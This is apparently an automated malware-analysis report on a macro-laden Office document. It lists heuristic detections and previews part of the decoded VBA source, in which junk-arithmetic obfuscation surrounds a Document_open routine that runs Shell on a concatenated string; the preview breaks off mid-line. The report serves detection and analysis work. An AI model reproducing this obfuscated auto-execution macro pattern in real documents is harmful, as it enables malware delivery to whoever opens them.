MALICIOUS
Risk Score: 162
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a Microsoft Office document containing VBA macros. The critical heuristic that fired indicates a Shell() call within the Document_Open macro, a common technique for executing arbitrary commands as soon as the document is opened. The macro's obfuscated nature and the presence of the Shell() call strongly suggest that it is designed to download and execute a secondary payload.
Heuristics (5)
- VBA macros detected (medium; 3 related findings) [OLE_VBA_MACROS]: Document contains VBA macro code.
- Shell() call in VBA (critical) [OLE_VBA_SHELL]: Shell() call in VBA.
- Document_Open macro (high) [OLE_VBA_DOCOPEN]: Document_Open macro.
- VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info) [EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body).
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 65309 bytes |

SHA-256 (macros.bas): 3215b001258a1a0fe6c2218233d9983b30fed247a9fab808169b38a3a0f46282
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "oizMYZcvn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function antSFptqTR()
On Error Resume Next
zObqmj = 51459 + hawLtW - (EwjdOW + RjVEB)
uViiYh = 30095 + zqjkz - (ANYwm + SslUOT)
soEhqi = 99070 + nWrCuc - (tAClAh + nRqCiB)
PPwzo = 97954 + jtVpJ - (qSrZmv + KNPjvo)
UErjd = 20653 + CtPKXZ - (GjzqE + TLhpBu)
REzUJ = 73136 + uwWEPk - (wnkkn + KiLLQc)
End Function
Private Function YJUoLMTalSB()
On Error Resume Next
vdpIVL = 80807 + uvdPVi - (vUfYs + pBdzzq)
cMIXV = 39208 + HwhwG - (FLJVwH + ofiYqD)
isBhW = 84002 + XCmHQp - (XNcAFS + viwbwR)
HMILjP = 85892 + trZTf - (advRYq + RquZkT)
khRWzZ = 11511 + QkpUoG - (prEvIU + qwfZnK)
mwvQP = 95355 + jLKck - (BVubG + XzEEuj)
End Function
Private Function nDzsZCmKOwiHw()
On Error Resume Next
YjsZk = 40251 + LzsWQ - (kiPAzf + PIkPUH)
zcFch = 99595 + XOzim - (MTcqF + DGwCbk)
NQwEjl = 33795 + TSfrG - (fXPPk + KdkqO)
pJYlK = 12582 + ozsuI - (BijJz + GMMfz)
JcdYl = 81519 + VwXIZG - (ClMtW + XwMjUF)
End Function
Private Sub Document_open()
On Error Resume Next
zcEIF = 13634 + AOwoBj + Ufhpzq / zTFlSZ - 21657 + VdJXW - (16835 + FkfWcT + ftwOY * kdADj)
AjqrU = 57575 + uZqEu + vaQCJ / dKILI - 12132 + KNTSPL - (77400 + KWLaG + vzOYPv * wdonm)
wHTnl = 65922 + ThBqYp + iTUkQ / CwadwR - 8354 + YILli - (37045 + DCSaK + soPUp * uEFpva)
Shell "" + zXnhQwsT + NppazJbORqo + CVar("c") + EBzRrcGoHKWG + pLVQLOVAjYJjr + ausuu + ablhHbTij + OQYTX + IiIjMRzzpPN + RncdnQsTU + LzUiwLpjEA + jiDrGwZ + bnTHfjG + WvzfOm + WodqNMEtbA + VSNajFFsFuo + fibUiBGk + ODDEJMrZ + bbsizFa + NXkrI + DFjWok + cjHdkcb + iNWCcOGK + qfhiDLv + azHHiOTq + SSvROpzWK + jzIFacD + sLwtpjXNi + mUmdiFCqR + UWjqnNcokk + rViljTAb + tGVlDFbDZiM, 0
mwJwU = 88872 + zzUSnO + EdbhA / JMuXH - 46694 + hrFNu - (38651 + UIHzG + Ehiwj * YQIJOD)
sLbLjf = 60656 + rbtSBd + XMuWIw / ooMZj - 21662 + uivwjq - (50295 + HQvaz + ibSCb * fNnpko)
NaElo = 92306 + QFsHXS + uwWbb / PbivoS - 109 + ZhqJGS - (80239 + DVKKMo + lqLWMV * mnbrl)
End Sub
Private Function nKzLQLwDpVIjw()
On Error Resume Next
rPfNHf = (FSzsq / zpkfTM + 66598 / 46772) / (97983 / ShpSuM * (KrzRNz + 43782))
mtCbo = 10787 + radwm + jMtdb / OaDAQS - 5052 + TTzqYV - (90064 + krYolW + YhUYv * dbiIU)
itmJmY = 95411 + cnXQH + bCEmss / iSvtG - 19848 + sThETP - (7146 + EPCNYv + uwHocB * ZVbJX)
UbWwYr = (bhUji / VWJTz + 8091 / 47824) / (92499 / Yvuzru * (PnPZS + 44766))
QnpiK = (lQbjkv / LVCsdN + 61686 / 34641) / (23454 / spmAq * (jpNjC + 91871))
End Function
Private Function zWvErYBz()
On Error Resume Next
icCciv = 23925 + hawws + hXIXQ / qBNFU - 36770 + misCYX - (43753 + tIifr + tozMql * QrtvB)
VAsBQ = 32440 + bzwEcw + RNvDiP / DCuXnO - 14737 + EktuVq - (40149 + lWKHJ + uEVaIn * dzPBTS)
QKQBCi = 56403 + EupRz + GZKCHX / QkNmF - 22461 + rtJjC - (92353 + FNcJr + KERKKo * IqRaI)
zZDPz = 37111 + UKlFP + bBLit / jsMTC - 53494 + lKAbj - (51897 + XRfKM + Xjpuj * vkwGf)
dPwIL = 39165 + hoYXZW + oOdrZ / wMNtd - 65330 + VmzGX - (64137 + ddMWU + IMzbo * OQccP)
rzjnGA = 76479 + hzUiBi + jKVBVh / ACSmzj - 61221 + DVrCjW - (81042 + ZJYfqj + LiZCD * liOAzz)
End Function
Private Function DHBuvwqzvW()
On Error Resume Next
kiXGiK = 72828 + uwPpdE + EnrPu / bpEAHQ - 15459 + SjikwC - (74516 + qzmcil + JGABAt * HPdwI)
wrwBCT = 63918 + IXicw + rdCkX / IFGRi - 92387 + XUfdfM - (16247 + mRwwfw + LfcZv * GMzLzi)
TdWFh = 89137 + zbIcW + XiTXh / StlQf - 49385 + KivSb - (35617 + XDPbib + NDuqz * OqFsNk)
TiNqf = 29371 + kCJjJm + TSroFj / pqajj - 7287 + ZDFro - (58547 + VClCM + dBlJpG * XmBYiu)
Gatdu = 53461 + hFiCZ + wtcRLq / vtHPH - 78876 + YSHCtw - (14225 + WtwoJL + AVwbPb * nLkRi)
End Function
Private Function DvjGnMS()
On Error Resume Next
wGSrlK = (tsWEwC / vBhdCH + 47715 / 47184) / (78363 / sDdiz * (iGPHtc +
... (truncated)